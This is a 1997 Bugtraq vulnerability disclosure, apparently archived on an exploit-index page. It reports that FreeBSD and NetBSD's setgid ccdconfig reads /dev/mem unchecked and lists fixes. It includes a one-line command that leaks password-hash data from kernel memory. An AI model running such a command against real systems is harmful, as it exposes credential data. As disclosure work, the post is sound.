Date: Wed, 31 Dec 1997 02:02:31 +0000
From: Niall Smart <rotel@INDIGO.IE>
To: BUGTRAQ@NETSPACE.ORG
Subject: Vulnerability in ccdconfig

Hi,

FreeBSD and NetBSD's ccdconfig doesn't do proper checking of the
argument to -f:

[nsmart@ginseng ~]$ ccdconfig -U -f /dev/mem 2>&1 | strings | grep Charlie
root:iDeLeTeDiT:0:0::0:0:Charlie: No such file or directory
^C

I had to cat /etc/master.passwd in another window to get this to
work though :) So perhaps its not very easily exploitable, but
is worth fixing nonetheless.

This bug was also spotted by olivier@secnet.com and fixed in OpenBSD
some time ago.

Fixes:

 * FreeBSD and NetBSD have been notified of the problem and have fixed
   it in their source tree's as of yesterday  (FreeBSD-current,
   FreeBSD-stable, NetBSD-current)  Retrieve the patched ccdconfig.c
   and compile yourself a new ccdconfig.

 * "chmod g-s /sbin/ccdconfig". I can't think of any reason for it to be
   sgid kmem.

Regards,

Niall

                               More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
 All OS's           Linux     Solaris/SunOS Micro$oft
 *BSD               Macintosh AIX           IRIX
 ULTRIX/Digital UNIXHP/UX     SCO           Remote exploits

This page is part of Fyodor's exploit world. Please do not steal it. For a
free program to automate s 92 canning your network for vulnerable hosts and
services, check out my network mapping tool, nmap. 0